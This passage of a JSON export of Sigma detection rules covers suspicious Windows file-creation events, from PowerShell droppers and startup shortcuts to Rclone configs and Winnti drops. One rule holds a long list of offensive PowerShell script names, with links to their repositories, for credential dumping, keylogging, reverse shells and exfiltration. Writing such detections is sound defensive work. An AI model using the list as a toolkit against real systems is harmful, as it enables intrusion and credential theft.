    "path": "rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml",
    "content": "title: PCRE.NET Package Temp Files\nid: 6e90ae7a-7cd3-473f-a035-4ebb72d961da\nstatus: test\ndescription: Detects processes creating temp files related to PCRE.NET package\nreferences:\n    - https://twitter.com/rbmaslen/status/1321859647091970051\n    - https://twitter.com/tifkin_/status/1321916444557365248\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-29\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: \\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml",
    "content": "title: Suspicious File Created In PerfLogs\nid: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b\nstatus: test\ndescription: Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files\nreferences:\n    - Internal Research\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\PerfLogs\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.bin'\n            - '.chm'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.lnk'\n            - '.ps1'\n            - '.psm1'\n            - '.py'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml",
    "content": "title: Potential Binary Or Script Dropper Via PowerShell\nid: 7047d730-036f-4f40-b9d8-1c63e36d5e62\nstatus: test\ndescription: Detects PowerShell creating a binary executable or a script file.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-17\nmodified: 2025-07-04\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.jar'\n            - '.js'\n            - '.ocx'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    filter_main_user_temp:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_main_other_temp:\n        # Example: C:\\Windows\\Temp\\0DA9758B-4649-4969-9409-5CBDF193FB53\\TransmogProvider.dll\n        TargetFilename|startswith:\n            - 'C:\\Windows\\Temp\\'\n            - 'C:\\Windows\\SystemTemp\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_main_powershell_module:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\WindowsPowerShell\\Modules\\' # C:\\Users\\xxxx\\Documents\\WindowsPowerShell\\Modules\\powershell-yaml\\0.4.12\\lib\\net47\\PowerShellYamlSerializer.dll\n        TargetFilename|endswith: '.dll'\n    filter_main_nuget:\n        TargetFilename|startswith: 'C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\'\n        TargetFilename|endswith: '\\Microsoft.PackageManagement.NuGetProvider.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml",
    "content": "title: PowerShell Script Dropped Via PowerShell.EXE\nid: 576426ad-0131-4001-ae01-be175da0c108\nstatus: test\ndescription: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution\nauthor: frack113\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|endswith: '.ps1'\n    filter_main_psscriptpolicytest:\n        TargetFilename|contains: '__PSScriptPolicyTest_'\n    filter_main_appdata:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n    filter_main_windows_temp:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml",
    "content": "title: Malicious PowerShell Scripts - FileCreation\nid: f331aa1f-8c53-4fc3-b083-cc159bc971cb\nrelated:\n    - id: 41025fd7-0466-4650-a813-574aaacbe7f4\n      type: similar\nstatus: test\ndescription: Detects the creation of known offensive powershell scripts used for exploitation\nreferences:\n    - https://github.com/PowerShellMafia/PowerSploit\n    - https://github.com/NetSPI/PowerUpSQL\n    - https://github.com/CsEnox/EventViewer-UACBypass\n    - https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\n    - https://github.com/nettitude/Invoke-PowerThIEf\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein\ndate: 2018-04-07\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|endswith:\n            # Note: Please ensure alphabetical order when adding new entries\n            - '\\Add-ConstrainedDelegationBackdoor.ps1'\n            - '\\Add-Exfiltration.ps1'\n            - '\\Add-Persistence.ps1'\n            - '\\Add-RegBackdoor.ps1'\n            - '\\Add-RemoteRegBackdoor.ps1'\n            - '\\Add-ScrnSaveBackdoor.ps1'\n            - '\\ADRecon.ps1'\n            - '\\AzureADRecon.ps1'\n            - '\\BadSuccessor.ps1'\n            - '\\Check-VM.ps1'\n            - '\\ConvertTo-ROT13.ps1'\n            - '\\Copy-VSS.ps1'\n            - '\\Create-MultipleSessions.ps1'\n            - '\\DNS_TXT_Pwnage.ps1'\n            - '\\dnscat2.ps1'\n            - '\\Do-Exfiltration.ps1'\n            - '\\DomainPasswordSpray.ps1'\n            - '\\Download_Execute.ps1'\n            - '\\Download-Execute-PS.ps1'\n            - '\\Enable-DuplicateToken.ps1'\n            - '\\Enabled-DuplicateToken.ps1'\n            - '\\Execute-Command-MSSQL.ps1'\n            - '\\Execute-DNSTXT-Code.ps1'\n            - '\\Execute-OnTime.ps1'\n            - '\\ExetoText.ps1'\n            - '\\Exploit-Jboss.ps1'\n            - '\\Find-AVSignature.ps1'\n            - '\\Find-Fruit.ps1'\n            - '\\Find-GPOLocation.ps1'\n            - '\\Find-TrustedDocuments.ps1'\n            - '\\FireBuster.ps1'\n            - '\\FireListener.ps1'\n            - '\\Get-ApplicationHost.ps1'\n            - '\\Get-ChromeDump.ps1'\n            - '\\Get-ClipboardContents.ps1'\n            - '\\Get-ComputerDetail.ps1'\n            - '\\Get-FoxDump.ps1'\n            - '\\Get-GPPAutologon.ps1'\n            - '\\Get-GPPPassword.ps1'\n            - '\\Get-IndexedItem.ps1'\n            - '\\Get-Keystrokes.ps1'\n            - '\\Get-LSASecret.ps1'\n            - '\\Get-MicrophoneAudio.ps1'\n            - '\\Get-PassHashes.ps1'\n            - '\\Get-PassHints.ps1'\n            - '\\Get-RegAlwaysInstallElevated.ps1'\n            - '\\Get-RegAutoLogon.ps1'\n            - '\\Get-RickAstley.ps1'\n            - '\\Get-Screenshot.ps1'\n            - '\\Get-SecurityPackages.ps1'\n            - '\\Get-ServiceFilePermission.ps1'\n            - '\\Get-ServicePermission.ps1'\n            - '\\Get-ServiceUnquoted.ps1'\n            - '\\Get-SiteListPassword.ps1'\n            - '\\Get-System.ps1'\n            - '\\Get-TimedScreenshot.ps1'\n            - '\\Get-UnattendedInstallFile.ps1'\n            - '\\Get-Unconstrained.ps1'\n            - '\\Get-USBKeystrokes.ps1'\n            - '\\Get-VaultCredential.ps1'\n            - '\\Get-VulnAutoRun.ps1'\n            - '\\Get-VulnSchTask.ps1'\n            - '\\Get-WebConfig.ps1'\n            - '\\Get-WebCredentials.ps1'\n            - '\\Get-WLAN-Keys.ps1'\n            - '\\Gupt-Backdoor.ps1'\n            - '\\HTTP-Backdoor.ps1'\n            - '\\HTTP-Login.ps1'\n            - '\\Install-ServiceBinary.ps1'\n            - '\\Install-SSP.ps1'\n            - '\\Invoke-ACLScanner.ps1'\n            - '\\Invoke-ADSBackdoor.ps1'\n            - '\\Invoke-AmsiBypass.ps1'\n            - '\\Invoke-ARPScan.ps1'\n            - '\\Invoke-BackdoorLNK.ps1'\n            - '\\Invoke-BadPotato.ps1'\n            - '\\Invoke-BetterSafetyKatz.ps1'\n            - '\\Invoke-BruteForce.ps1'\n            - '\\Invoke-BypassUAC.ps1'\n            - '\\Invoke-Carbuncle.ps1'\n            - '\\Invoke-Certify.ps1'\n            - '\\Invoke-ConPtyShell.ps1'\n            - '\\Invoke-CredentialInjection.ps1'\n            - '\\Invoke-CredentialsPhish.ps1'\n            - '\\Invoke-DAFT.ps1'\n            - '\\Invoke-DCSync.ps1'\n            - '\\Invoke-Decode.ps1'\n            - '\\Invoke-DinvokeKatz.ps1'\n            - '\\Invoke-DllInjection.ps1'\n            - '\\Invoke-DNSExfiltrator.ps1'\n            - '\\Invoke-DNSUpdate.ps1'\n            - '\\Invoke-DowngradeAccount.ps1'\n            - '\\Invoke-EgressCheck.ps1'\n            - '\\Invoke-Encode.ps1'\n            - '\\Invoke-EventViewer.ps1'\n            - '\\Invoke-Eyewitness.ps1'\n            - '\\Invoke-FakeLogonScreen.ps1'\n            - '\\Invoke-Farmer.ps1'\n            - '\\Invoke-Get-RBCD-Threaded.ps1'\n            - '\\Invoke-Gopher.ps1'\n            - '\\Invoke-Grouper2.ps1'\n            - '\\Invoke-Grouper3.ps1'\n            - '\\Invoke-HandleKatz.ps1'\n            - '\\Invoke-Interceptor.ps1'\n            - '\\Invoke-Internalmonologue.ps1'\n            - '\\Invoke-Inveigh.ps1'\n            - '\\Invoke-InveighRelay.ps1'\n            - '\\Invoke-JSRatRegsvr.ps1'\n            - '\\Invoke-JSRatRundll.ps1'\n            - '\\Invoke-KrbRelay.ps1'\n            - '\\Invoke-KrbRelayUp.ps1'\n            - '\\Invoke-LdapSignCheck.ps1'\n            - '\\Invoke-Lockless.ps1'\n            - '\\Invoke-MalSCCM.ps1'\n            - '\\Invoke-Mimikatz.ps1'\n            - '\\Invoke-MimikatzWDigestDowngrade.ps1'\n            - '\\Invoke-Mimikittenz.ps1'\n            - '\\Invoke-MITM6.ps1'\n            - '\\Invoke-NanoDump.ps1'\n            - '\\Invoke-NetRipper.ps1'\n            - '\\Invoke-NetworkRelay.ps1'\n            - '\\Invoke-NinjaCopy.ps1'\n            - '\\Invoke-OxidResolver.ps1'\n            - '\\Invoke-P0wnedshell.ps1'\n            - '\\Invoke-P0wnedshellx86.ps1'\n            - '\\Invoke-Paranoia.ps1'\n            - '\\Invoke-PortScan.ps1'\n            - '\\Invoke-PoshRatHttp.ps1'\n            - '\\Invoke-PoshRatHttps.ps1'\n            - '\\Invoke-PostExfil.ps1'\n            - '\\Invoke-PowerDump.ps1'\n            - '\\Invoke-PowerDPAPI.ps1'\n            - '\\Invoke-PowerShellIcmp.ps1'\n            - '\\Invoke-PowerShellTCP.ps1'\n            - '\\Invoke-PowerShellTcpOneLine.ps1'\n            - '\\Invoke-PowerShellTcpOneLineBind.ps1'\n            - '\\Invoke-PowerShellUdp.ps1'\n            - '\\Invoke-PowerShellUdpOneLine.ps1'\n            - '\\Invoke-PowerShellWMI.ps1'\n            - '\\Invoke-PowerThIEf.ps1'\n            - '\\Invoke-PPLDump.ps1'\n            - '\\Invoke-Prasadhak.ps1'\n            - '\\Invoke-PsExec.ps1'\n            - '\\Invoke-PsGcat.ps1'\n            - '\\Invoke-PsGcatAgent.ps1'\n            - '\\Invoke-PSInject.ps1'\n            - '\\Invoke-PsUaCme.ps1'\n            - '\\Invoke-ReflectivePEInjection.ps1'\n            - '\\Invoke-ReverseDNSLookup.ps1'\n            - '\\Invoke-Rubeus.ps1'\n            - '\\Invoke-RunAs.ps1'\n            - '\\Invoke-SafetyKatz.ps1'\n            - '\\Invoke-SauronEye.ps1'\n            - '\\Invoke-SCShell.ps1'\n            - '\\Invoke-Seatbelt.ps1'\n            - '\\Invoke-ServiceAbuse.ps1'\n            - '\\Invoke-SessionGopher.ps1'\n            - '\\Invoke-ShellCode.ps1'\n            - '\\Invoke-SMBScanner.ps1'\n            - '\\Invoke-Snaffler.ps1'\n            - '\\Invoke-Spoolsample.ps1'\n            - '\\Invoke-SSHCommand.ps1'\n            - '\\Invoke-SSIDExfil.ps1'\n            - '\\Invoke-StandIn.ps1'\n            - '\\Invoke-StickyNotesExtract.ps1'\n            - '\\Invoke-Tater.ps1'\n            - '\\Invoke-Thunderfox.ps1'\n            - '\\Invoke-ThunderStruck.ps1'\n            - '\\Invoke-TokenManipulation.ps1'\n            - '\\Invoke-Tokenvator.ps1'\n            - '\\Invoke-TotalExec.ps1'\n            - '\\Invoke-UrbanBishop.ps1'\n            - '\\Invoke-UserHunter.ps1'\n            - '\\Invoke-VoiceTroll.ps1'\n            - '\\Invoke-Whisker.ps1'\n            - '\\Invoke-WinEnum.ps1'\n            - '\\Invoke-winPEAS.ps1'\n            - '\\Invoke-WireTap.ps1'\n            - '\\Invoke-WmiCommand.ps1'\n            - '\\Invoke-WScriptBypassUAC.ps1'\n            - '\\Invoke-Zerologon.ps1'\n            - '\\Keylogger.ps1'\n            - '\\MailRaider.ps1'\n            - '\\New-HoneyHash.ps1'\n            - '\\OfficeMemScraper.ps1'\n            - '\\Offline_Winpwn.ps1'\n            - '\\Out-CHM.ps1'\n            - '\\Out-DnsTxt.ps1'\n            - '\\Out-Excel.ps1'\n            - '\\Out-HTA.ps1'\n            - '\\Out-Java.ps1'\n            - '\\Out-JS.ps1'\n            - '\\Out-Minidump.ps1'\n            - '\\Out-RundllCommand.ps1'\n            - '\\Out-SCF.ps1'\n            - '\\Out-SCT.ps1'\n            - '\\Out-Shortcut.ps1'\n            - '\\Out-WebQuery.ps1'\n            - '\\Out-Word.ps1'\n            - '\\Parse_Keys.ps1'\n            - '\\Port-Scan.ps1'\n            - '\\PowerBreach.ps1'\n            - '\\powercat.ps1'\n            - '\\Powermad.ps1'\n            - '\\PowerRunAsSystem.psm1'\n            - '\\PowerSharpPack.ps1'\n            - '\\PowerUp.ps1'\n            - '\\PowerUpSQL.ps1'\n            - '\\PowerView.ps1'\n            - '\\PSAsyncShell.ps1'\n            - '\\RemoteHashRetrieval.ps1'\n            - '\\Remove-Persistence.ps1'\n            - '\\Remove-PoshRat.ps1'\n            - '\\Remove-Update.ps1'\n            - '\\Run-EXEonRemote.ps1'\n            - '\\Schtasks-Backdoor.ps1'\n            - '\\Set-DCShadowPermissions.ps1'\n            - '\\Set-MacAttribute.ps1'\n            - '\\Set-RemotePSRemoting.ps1'\n            - '\\Set-RemoteWMI.ps1'\n            - '\\Set-Wallpaper.ps1'\n            - '\\Show-TargetScreen.ps1'\n            - '\\Speak.ps1'\n            - '\\Start-CaptureServer.ps1'\n            - '\\Start-WebcamRecorder.ps1'\n            - '\\StringToBase64.ps1'\n            - '\\TexttoExe.ps1'\n            - '\\Veeam-Get-Creds.ps1'\n            - '\\VolumeShadowCopyTools.ps1'\n            - '\\WinPwn.ps1'\n            - '\\WSUSpendu.ps1'\n    selection_invoke_sharp:\n        TargetFilename|contains: 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n        TargetFilename|endswith: '.ps1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_creation.yml",
    "content": "title: PowerShell Module File Created\nid: e36941d0-c0f0-443f-bc6f-cb2952eb69ea\nstatus: test\ndescription: Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|contains:\n            - '\\WindowsPowerShell\\Modules\\'\n            - '\\PowerShell\\7\\Modules\\'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml",
    "content": "title: Potential Suspicious PowerShell Module File Created\nid: e8a52bbd-bced-459f-bd93-64db45ce7657\nstatus: test\ndescription: Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is somewhat an uncommon practice as legitimate modules often includes a version folder.\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic\n            - '\\\\WindowsPowerShell\\\\Modules\\\\*\\.ps'\n            - '\\\\WindowsPowerShell\\\\Modules\\\\*\\.dll'\n    condition: selection\nfalsepositives:\n    - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml",
    "content": "title: PowerShell Module File Created By Non-PowerShell Process\nid: e3845023-ca9a-4024-b2b2-5422156d5527\nstatus: test\ndescription: Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. by a non-PowerShell process\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\nmodified: 2025-10-07\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\WindowsPowerShell\\Modules\\'\n            - '\\PowerShell\\7\\Modules\\'\n    filter_main_pwsh:\n        Image|endswith:\n            - ':\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - ':\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - ':\\Windows\\System32\\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448\n            - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - ':\\Windows\\SysWOW64\\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448\n            - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml",
    "content": "title: Potential Startup Shortcut Persistence Via PowerShell.EXE\nid: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d\nstatus: test\ndescription: |\n    Detects PowerShell writing startup shortcuts.\n    This procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\n    Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\n    In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder\nauthor: Christopher Peacock '@securepeacock', SCYTHE\ndate: 2021-10-24\nmodified: 2023-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|contains: '\\start menu\\programs\\startup\\'\n        TargetFilename|endswith: '.lnk'\n    condition: selection\nfalsepositives:\n    - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml",
    "content": "title: PSScriptPolicyTest Creation By Uncommon Process\nid: 1027d292-dd87-4a1a-8701-2abe04d7783c\nstatus: test\ndescription: Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.\nreferences:\n    - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '__PSScriptPolicyTest_'\n    filter_main_powershell:\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_pwsh_preview:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n        Image|endswith: '\\pwsh.exe'\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\System32\\dsac.exe'\n            - 'C:\\Windows\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n            - 'C:\\Windows\\System32\\wsmprovhost.exe'\n            - 'C:\\Windows\\SysWOW64\\sdiagnhost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_rclone_config_files.yml",
    "content": "title: Rclone Config File Creation\nid: 34986307-b7f4-49be-92f3-e7a4d01ac5db\nstatus: test\ndescription: Detects Rclone config files being created\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-26\nmodified: 2023-05-09\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\.config\\rclone\\'\n    condition: selection\nfalsepositives:\n    - Legitimate Rclone usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml",
    "content": "title: .RDP File Created By Uncommon Application\nid: fccfb43e-09a7-4bd2-8b37-a5a7df33386d\nrelated:\n    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f\n      type: derived\nstatus: test\ndescription: |\n    Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\nmodified: 2024-11-01\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.rdp'\n        Image|endswith:\n            # Covers browsers\n            - '\\brave.exe'\n            - '\\CCleaner Browser\\Application\\CCleanerBrowser.exe'\n            - '\\chromium.exe'\n            - '\\firefox.exe'\n            - '\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\iexplore.exe'\n            - '\\microsoftedge.exe'\n            - '\\msedge.exe'\n            - '\\Opera.exe'\n            - '\\Vivaldi.exe'\n            - '\\Whale.exe'\n            # Covers email clients\n            - '\\olk.exe' # Outlook\n            - '\\Outlook.exe'\n            - '\\RuntimeBroker.exe' # If the windows mail client is used\n            - '\\Thunderbird.exe'\n            # Covers chat applications\n            - '\\Discord.exe' # Should open the browser for download, but just in case.\n            - '\\Keybase.exe'\n            - '\\msteams.exe'\n            - '\\Slack.exe'\n            - '\\teams.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml",
    "content": "title: Potential Winnti Dropper Activity\nid: 130c9e58-28ac-4f83-8574-0a4cc913b97e\nstatus: test\ndescription: Detects files dropped by Winnti as described in RedMimicry Winnti playbook\nreferences:\n    - https://redmimicry.com/posts/redmimicry-winnti/#dropper\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2023-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\gthread-3.6.dll'\n            - '\\sigcmm-2.4.dll'\n            - '\\Windows\\Temp\\tmp.bat'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml",
    "content": "title: PDF File Created By RegEdit.EXE\nid: 145095eb-e273-443b-83d0-f9b519b7867b\nstatus: test\ndescription: |\n    Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\n    This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.\nreferences:\n    - https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-08\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n        TargetFilename|endswith: '.pdf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remcom_service.yml",
